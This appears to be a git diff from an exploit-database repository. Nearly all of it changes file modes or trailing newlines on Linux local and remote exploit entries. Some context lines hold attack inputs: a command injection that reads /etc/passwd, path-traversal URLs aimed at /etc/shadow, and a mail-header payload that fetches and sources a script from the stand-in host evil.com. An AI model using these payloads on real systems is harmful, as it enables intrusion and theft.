b/platforms/linux/local/41766.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41770.txt b/platforms/linux/local/41770.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41886.c b/platforms/linux/local/41886.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41907.c b/platforms/linux/local/41907.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41923.txt b/platforms/linux/local/41923.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41973.txt b/platforms/linux/local/41973.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41994.c b/platforms/linux/local/41994.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41995.c b/platforms/linux/local/41995.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/41999.txt b/platforms/linux/local/41999.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/42045.c b/platforms/linux/local/42045.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/42053.c b/platforms/linux/local/42053.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/42183.c b/platforms/linux/local/42183.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/42305.txt b/platforms/linux/local/42305.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/42356.txt b/platforms/linux/local/42356.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/42611.txt b/platforms/linux/local/42611.txt old mode 100755 new mode 100644 index c42ef63a5..e9c7db505 --- a/platforms/linux/local/42611.txt +++ b/platforms/linux/local/42611.txt @@ -27,4 +27,4 @@ For how to create the malicious gems, see the attached file src.tar.gz. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42611.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42611.zip \ No newline at end of file diff --git a/platforms/linux/local/42626.c b/platforms/linux/local/42626.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/42936.txt b/platforms/linux/local/42936.txt old mode 100755 new mode 100644 index 88c3f157e..8f3825818 --- a/platforms/linux/local/42936.txt +++ b/platforms/linux/local/42936.txt @@ -76,4 +76,4 @@ Update to UCOPIA 5.1.8 SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ -* Twitter: @sysdream \ No newline at end of file +* Twitter: @sysdream \ No newline at end of file diff --git a/platforms/linux/local/42937.txt b/platforms/linux/local/42937.txt old mode 100755 new mode 100644 index 828ad50c7..9a3df48bc --- a/platforms/linux/local/42937.txt +++ b/platforms/linux/local/42937.txt @@ -87,4 +87,4 @@ Update to UCOPIA 5.1.8 SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ -* Twitter: @sysdream \ No newline at end of file +* Twitter: @sysdream \ No newline at end of file diff --git a/platforms/linux/local/43006.txt b/platforms/linux/local/43006.txt old mode 100755 new mode 100644 index c1b580880..353f10db5 --- a/platforms/linux/local/43006.txt +++ b/platforms/linux/local/43006.txt @@ -86,4 +86,4 @@ Timeline disclosure 2017-10-12 Vendor contacted, replied to create a public issue on GitHub 2017-10-13 Created public issue on GitHub -2017-10-13 Advisory release +2017-10-13 Advisory release \ No newline at end of file diff --git a/platforms/linux/local/43007.txt b/platforms/linux/local/43007.txt old mode 100755 new mode 100644 index 6742a3ba4..c2dab50e9 --- a/platforms/linux/local/43007.txt +++ b/platforms/linux/local/43007.txt @@ -190,4 +190,4 @@ Timeline disclosure 2017-10-12 Vendor contacted, replied to create a public issue on GitHub 2017-10-13 Created public issues on GitHub -2017-10-13 Advisory release +2017-10-13 Advisory release \ No newline at end of file diff --git a/platforms/linux/local/43029.c b/platforms/linux/local/43029.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/43127.c b/platforms/linux/local/43127.c old mode 100755 new mode 100644 index d47193f1c..8fcd1f8f9 --- a/platforms/linux/local/43127.c +++ b/platforms/linux/local/43127.c @@ -1001,4 +1001,4 @@ int main() { unseccomp(); return 0; -} +} \ No newline at end of file diff --git a/platforms/linux/local/438.c b/platforms/linux/local/438.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/469.c b/platforms/linux/local/469.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/4698.c b/platforms/linux/local/4698.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/470.c b/platforms/linux/local/470.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/4756.c b/platforms/linux/local/4756.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/476.c b/platforms/linux/local/476.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/479.c b/platforms/linux/local/479.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/5092.c b/platforms/linux/local/5092.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/5093.c b/platforms/linux/local/5093.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/5424.txt b/platforms/linux/local/5424.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/586.c b/platforms/linux/local/586.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/587.c b/platforms/linux/local/587.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/591.c b/platforms/linux/local/591.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/600.c b/platforms/linux/local/600.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/601.c b/platforms/linux/local/601.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/624.c b/platforms/linux/local/624.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/657.c b/platforms/linux/local/657.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/669.c b/platforms/linux/local/669.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/684.c b/platforms/linux/local/684.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/6851.c b/platforms/linux/local/6851.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/695.c b/platforms/linux/local/695.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/71.c b/platforms/linux/local/71.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/7177.c b/platforms/linux/local/7177.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/718.c b/platforms/linux/local/718.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/72.c b/platforms/linux/local/72.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/7393.txt b/platforms/linux/local/7393.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/744.c b/platforms/linux/local/744.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/75.c b/platforms/linux/local/75.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/756.c b/platforms/linux/local/756.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/7618.c b/platforms/linux/local/7618.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/763.c b/platforms/linux/local/763.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/7681.txt b/platforms/linux/local/7681.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/776.c b/platforms/linux/local/776.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/778.c b/platforms/linux/local/778.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/7855.txt b/platforms/linux/local/7855.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/7856.txt b/platforms/linux/local/7856.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/791.c b/platforms/linux/local/791.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/792.c b/platforms/linux/local/792.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/816.c b/platforms/linux/local/816.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/824.c b/platforms/linux/local/824.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/8303.c b/platforms/linux/local/8303.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/8534.c b/platforms/linux/local/8534.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/8572.c b/platforms/linux/local/8572.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/8673.c b/platforms/linux/local/8673.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/8678.c b/platforms/linux/local/8678.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/876.c b/platforms/linux/local/876.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/895.c b/platforms/linux/local/895.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/91.c b/platforms/linux/local/91.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/914.c b/platforms/linux/local/914.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9191.txt b/platforms/linux/local/9191.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9208.txt b/platforms/linux/local/9208.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/924.c b/platforms/linux/local/924.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/926.c b/platforms/linux/local/926.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/93.c b/platforms/linux/local/93.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9352.c b/platforms/linux/local/9352.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9363.c b/platforms/linux/local/9363.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9435.txt b/platforms/linux/local/9435.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9436.txt b/platforms/linux/local/9436.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9479.c b/platforms/linux/local/9479.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/950.c b/platforms/linux/local/950.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9513.c b/platforms/linux/local/9513.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9521.c b/platforms/linux/local/9521.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9543.c b/platforms/linux/local/9543.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9545.c b/platforms/linux/local/9545.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9574.txt b/platforms/linux/local/9574.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9575.c b/platforms/linux/local/9575.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9595.c b/platforms/linux/local/9595.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9598.txt b/platforms/linux/local/9598.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9608.c b/platforms/linux/local/9608.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9627.txt b/platforms/linux/local/9627.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9641.txt b/platforms/linux/local/9641.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/9709.txt b/platforms/linux/local/9709.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/973.c b/platforms/linux/local/973.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/102.c b/platforms/linux/remote/102.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1021.c b/platforms/linux/remote/1021.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1038.c b/platforms/linux/remote/1038.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1055.c b/platforms/linux/remote/1055.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/10610.rb b/platforms/linux/remote/10610.rb index 986a5cae3..e3204da37 100755 --- a/platforms/linux/remote/10610.rb +++ b/platforms/linux/remote/10610.rb @@ -147,5 +147,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - \ No newline at end of file +end \ No newline at end of file diff --git a/platforms/linux/remote/107.c b/platforms/linux/remote/107.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/10980.txt b/platforms/linux/remote/10980.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/110.c b/platforms/linux/remote/110.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1123.c b/platforms/linux/remote/1123.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1138.c b/platforms/linux/remote/1138.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1139.c b/platforms/linux/remote/1139.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/11497.txt b/platforms/linux/remote/11497.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1171.c b/platforms/linux/remote/1171.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1209.c b/platforms/linux/remote/1209.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1232.c b/platforms/linux/remote/1232.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1238.c b/platforms/linux/remote/1238.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1258.php b/platforms/linux/remote/1258.php old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/12587.c b/platforms/linux/remote/12587.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/126.c b/platforms/linux/remote/126.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1272.c b/platforms/linux/remote/1272.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1295.c b/platforms/linux/remote/1295.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/132.c b/platforms/linux/remote/132.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/139.c b/platforms/linux/remote/139.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/143.c b/platforms/linux/remote/143.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1456.c b/platforms/linux/remote/1456.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1474.pm b/platforms/linux/remote/1474.pm old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1486.c b/platforms/linux/remote/1486.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1487.c b/platforms/linux/remote/1487.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/14925.txt b/platforms/linux/remote/14925.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/14976.txt b/platforms/linux/remote/14976.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/15318.txt b/platforms/linux/remote/15318.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/15662.txt b/platforms/linux/remote/15662.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1574.c b/platforms/linux/remote/1574.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1578.c b/platforms/linux/remote/1578.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/15806.txt b/platforms/linux/remote/15806.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1582.c b/platforms/linux/remote/1582.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/16.c b/platforms/linux/remote/16.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/167.c b/platforms/linux/remote/167.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/171.c b/platforms/linux/remote/171.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1717.c b/platforms/linux/remote/1717.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/174.c b/platforms/linux/remote/174.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1741.c b/platforms/linux/remote/1741.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1742.c b/platforms/linux/remote/1742.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1750.c b/platforms/linux/remote/1750.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/181.c b/platforms/linux/remote/181.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/1813.c b/platforms/linux/remote/1813.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/18145.py b/platforms/linux/remote/18145.py index c41f0284f..9a51f1ea8 100755 --- a/platforms/linux/remote/18145.py +++ b/platforms/linux/remote/18145.py @@ -195,7 +195,4 @@ evil_packet = Ether(type=0x2323, dst="ff:ff:ff:ff:ff:ff") / payload print "\t[+] Evil packet length : %d"%len(evil_packet) print "\t[+] Sending packet to broadcast" -sendp(evil_packet) - - - \ No newline at end of file +sendp(evil_packet) \ No newline at end of file diff --git a/platforms/linux/remote/18280.c b/platforms/linux/remote/18280.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19.c b/platforms/linux/remote/19.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19028.txt b/platforms/linux/remote/19028.txt old mode 100755 new mode 100644 index ab5eb92db..b72d0e3ee --- a/platforms/linux/remote/19028.txt +++ b/platforms/linux/remote/19028.txt @@ -16,4 +16,4 @@ quit 221 mail.victim.com Terminating The sed in the receipient strips all mail headers from the -message before passing it on to the shell. \ No newline at end of file +message before passing it on to the shell. \ No newline at end of file diff --git a/platforms/linux/remote/19069.txt b/platforms/linux/remote/19069.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19079.c b/platforms/linux/remote/19079.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19086.c b/platforms/linux/remote/19086.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19087.c b/platforms/linux/remote/19087.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19096.c b/platforms/linux/remote/19096.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19104.c b/platforms/linux/remote/19104.c old mode 100755 new mode 100644 index 8080e5292..e14a3194b --- a/platforms/linux/remote/19104.c +++ b/platforms/linux/remote/19104.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/127/info Statd is the RPC NFS status daemon. It is used to communicate status information to other services or host. @@ -5,6 +6,7 @@ Statd is the RPC NFS status daemon. It is used to communicate status information The version of statd shipped with many unix implementations contains a buffer overflow condition. This overflow condition exists in the handling of 'SM_MON' RPC requests. Any attacker to successfully exploit this vulnerability would gain root privileges on the target host. +*/ /* diff --git a/platforms/linux/remote/19105.c b/platforms/linux/remote/19105.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19107.c b/platforms/linux/remote/19107.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19109.c b/platforms/linux/remote/19109.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19111.c b/platforms/linux/remote/19111.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19112.c b/platforms/linux/remote/19112.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19119.c b/platforms/linux/remote/19119.c old mode 100755 new mode 100644 index 3a1b12c2a..49931caab --- a/platforms/linux/remote/19119.c +++ b/platforms/linux/remote/19119.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/150/info A number of vulnerabilities exist in Hewlett Packard's rlpdaemon under HPUX 9.x and 10.x. These vulnerabilities may allow for a remote attacker to access the system under the lp user account, as well as execute arbitrary commands remotely, also as user lp. @@ -9,6 +10,7 @@ There are three vulnerabilities: (culled from RSI Advisory RSI.0006.06-25-98.HP- #2: When the client passes a file to the rlpdaemon, no sanity checks are performed to ensure the validity of the filename. This allows for a remote attacker to send any file s/he wants and have it stored in the user lp's home directory. #3: The rlpdaemon will allow remote connections from any source port. This violates the lpd behavior recommended in RFC-1179 which explicitly states that only source ports of 721-731 should be allowed to access the daemon. +*/ /*** lpd-mail.c ** diff --git a/platforms/linux/remote/19123.c b/platforms/linux/remote/19123.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19124.txt b/platforms/linux/remote/19124.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19218.c b/platforms/linux/remote/19218.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19219.c b/platforms/linux/remote/19219.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19226.c b/platforms/linux/remote/19226.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19247.c b/platforms/linux/remote/19247.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19251.c b/platforms/linux/remote/19251.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19253.txt b/platforms/linux/remote/19253.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19297.c b/platforms/linux/remote/19297.c old mode 100755 new mode 100644 index 061e7bb0a..ad697dcbc --- a/platforms/linux/remote/19297.c +++ b/platforms/linux/remote/19297.c @@ -1,7 +1,8 @@ +/* source: http://www.securityfocus.com/bid/371/info - There is a vulnerability in the System Data Repository (SDR) subsystem. The SDR subsystem is used in IBM SP multi-machine parallel processing environments typically associated with Super Computing. The SDR is deisgned to allow multiple machines to share configuration and operational information. However, proper authentication is not in place in the SDR daemon 'sdrd', this allows un-authenticated users to arbitrarily pull any file off SDR hosts. +*/ /*## copyright LAST STAGE OF DELIRIUM oct 1998 poland *://lsd-pl.net/ #*/ /*## sdrd #*/ diff --git a/platforms/linux/remote/19458.c b/platforms/linux/remote/19458.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19475.c b/platforms/linux/remote/19475.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19476.c b/platforms/linux/remote/19476.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19503.txt b/platforms/linux/remote/19503.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19522.txt b/platforms/linux/remote/19522.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19557.txt b/platforms/linux/remote/19557.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19558.c b/platforms/linux/remote/19558.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19567.txt b/platforms/linux/remote/19567.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19634.c b/platforms/linux/remote/19634.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19729.c b/platforms/linux/remote/19729.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19801.c b/platforms/linux/remote/19801.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19868.c b/platforms/linux/remote/19868.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19879.txt b/platforms/linux/remote/19879.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19891.c b/platforms/linux/remote/19891.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19892.txt b/platforms/linux/remote/19892.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19926.c b/platforms/linux/remote/19926.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19947.c b/platforms/linux/remote/19947.c old mode 100755 new mode 100644 index bd7eede4a..bb02294b2 --- a/platforms/linux/remote/19947.c +++ b/platforms/linux/remote/19947.c @@ -48,4 +48,4 @@ main(int argc, const char* argv[]) /* Auth list.. empty data will do */ c = 0; write(1, &c, 1); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/remote/19948.c b/platforms/linux/remote/19948.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19966.c b/platforms/linux/remote/19966.c old mode 100755 new mode 100644 index 799580174..96f1469ae --- a/platforms/linux/remote/19966.c +++ b/platforms/linux/remote/19966.c @@ -200,4 +200,4 @@ main (int argc, char *argv[]) } return (0); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/remote/19983.c b/platforms/linux/remote/19983.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/19998.c b/platforms/linux/remote/19998.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20031.c b/platforms/linux/remote/20031.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20043.c b/platforms/linux/remote/20043.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20060.c b/platforms/linux/remote/20060.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20061.c b/platforms/linux/remote/20061.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20075.c b/platforms/linux/remote/20075.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20076.c b/platforms/linux/remote/20076.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20077.c b/platforms/linux/remote/20077.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20105.txt b/platforms/linux/remote/20105.txt old mode 100755 new mode 100644 index 9075f1445..6363cb1b7 --- a/platforms/linux/remote/20105.txt +++ b/platforms/linux/remote/20105.txt @@ -14,4 +14,4 @@ Another description, this one from Andreas Hasenack <andreas@conectiva.com.br>: 1. login remotely (X -broadcast) (have gdm, kdm, whatever running with XDMCP enabled somewhere) 2. after login, start Xnest with -broadcast again, for example 3. login again, now you will be using display :1 -4. this is treated as a console user, and commands only available to console users can be run, such as reboot. \ No newline at end of file +4. this is treated as a console user, and commands only available to console users can be run, such as reboot. \ No newline at end of file diff --git a/platforms/linux/remote/20143.txt b/platforms/linux/remote/20143.txt old mode 100755 new mode 100644 index 6f90f45b0..bf7b63167 --- a/platforms/linux/remote/20143.txt +++ b/platforms/linux/remote/20143.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1550/info ntop is a tool that shows the network usage, similar to what the popular top Unix command does. Starting ntop in web mode (with the -w parameter) starts ntop with it's own built in HTTP server, to allow remote access to the functions it provides. ntop does not properly authenticate requests and is vulnerable to a ../../ request whereby unauthorized files can be retrieved, including files which are only readable by root. -The default directory ntop serves HTML from is /etc/ntop/html so to retrieve /etc/shadow one can request the following URL: http://URL:port/../../shadow \ No newline at end of file +The default directory ntop serves HTML from is /etc/ntop/html so to retrieve /etc/shadow one can request the following URL: http://URL:port/../../shadow \ No newline at end of file diff --git a/platforms/linux/remote/20145.c b/platforms/linux/remote/20145.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20157.c b/platforms/linux/remote/20157.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20159.c b/platforms/linux/remote/20159.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20161.txt b/platforms/linux/remote/20161.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20210.txt b/platforms/linux/remote/20210.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20220.txt b/platforms/linux/remote/20220.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20236.txt b/platforms/linux/remote/20236.txt old mode 100755 new mode 100644 index bb7de073a..a95bba65c --- a/platforms/linux/remote/20236.txt +++ b/platforms/linux/remote/20236.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1707/info By submitting a specific url to the web server ("http://hosts.any/doc/packages/") , any user from any host may obtain a list of packages installed on a S.u.S.E 6.3 or 6.4 system. This problem is due to a configuration in the Apache httpd.conf supplied with S.u.S.E that permits anyone to request documents from this webroot subdirectory. The end result is that attackers will know what packages the victim has installed, which can assist in executing more complicated attacks. -Request "http://target/doc/packages/" with a web browser. \ No newline at end of file +Request "http://target/doc/packages/" with a web browser. \ No newline at end of file diff --git a/platforms/linux/remote/20237.c b/platforms/linux/remote/20237.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20246.txt b/platforms/linux/remote/20246.txt old mode 100755 new mode 100644 index 0238750c7..bde14e557 --- a/platforms/linux/remote/20246.txt +++ b/platforms/linux/remote/20246.txt @@ -16,4 +16,4 @@ http://target/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml Then type in host destination box: 127.0.0.1 | cat /etc/passwd -You will then be presented with the contents of the /etc/passwd file. \ No newline at end of file +You will then be presented with the contents of the /etc/passwd file. \ No newline at end of file diff --git a/platforms/linux/remote/20308.c b/platforms/linux/remote/20308.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/204.c b/platforms/linux/remote/204.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20496.c b/platforms/linux/remote/20496.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20569.c b/platforms/linux/remote/20569.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20597.txt b/platforms/linux/remote/20597.txt old mode 100755 new mode 100644 index 18891567f..9882cfcc4 --- a/platforms/linux/remote/20597.txt +++ b/platforms/linux/remote/20597.txt @@ -21,4 +21,4 @@ quit For the remote users, change the Reply-to field to something like: -Reply-to: a~.`/usr/bin/rcp\${IFS}user@evil.com:script\${IFS}/tmp/script&&source\${IFS}/tmp/script`.q~a/ad=cucu/c=blu\\\@kappa.ro \ No newline at end of file +Reply-to: a~.`/usr/bin/rcp\${IFS}user@evil.com:script\${IFS}/tmp/script&&source\${IFS}/tmp/script`.q~a/ad=cucu/c=blu\\\@kappa.ro \ No newline at end of file diff --git a/platforms/linux/remote/20619.c b/platforms/linux/remote/20619.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20622.c b/platforms/linux/remote/20622.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20636.txt b/platforms/linux/remote/20636.txt old mode 100755 new mode 100644 index 04ba957fd..385d35950 --- a/platforms/linux/remote/20636.txt +++ b/platforms/linux/remote/20636.txt @@ -8,4 +8,4 @@ http://target/cgi-bin/store.cgi?StartID=../etc/hosts%00.html http://target/cgi-bin/store.cgi?StartID=../etc/%00.html -^^ = Will obviously list the /etc/ directory. \ No newline at end of file +^^ = Will obviously list the /etc/ directory. \ No newline at end of file diff --git a/platforms/linux/remote/20690.sh b/platforms/linux/remote/20690.sh index 3ab4cf6e0..35ed4cd2d 100755 --- a/platforms/linux/remote/20690.sh +++ b/platforms/linux/remote/20690.sh @@ -13,4 +13,4 @@ bin quot pass shitold@bug.com ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* bye=20 -end=20 \ No newline at end of file +end=20 \ No newline at end of file diff --git a/platforms/linux/remote/20727.c b/platforms/linux/remote/20727.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20749.c b/platforms/linux/remote/20749.c old mode 100755 new mode 100644 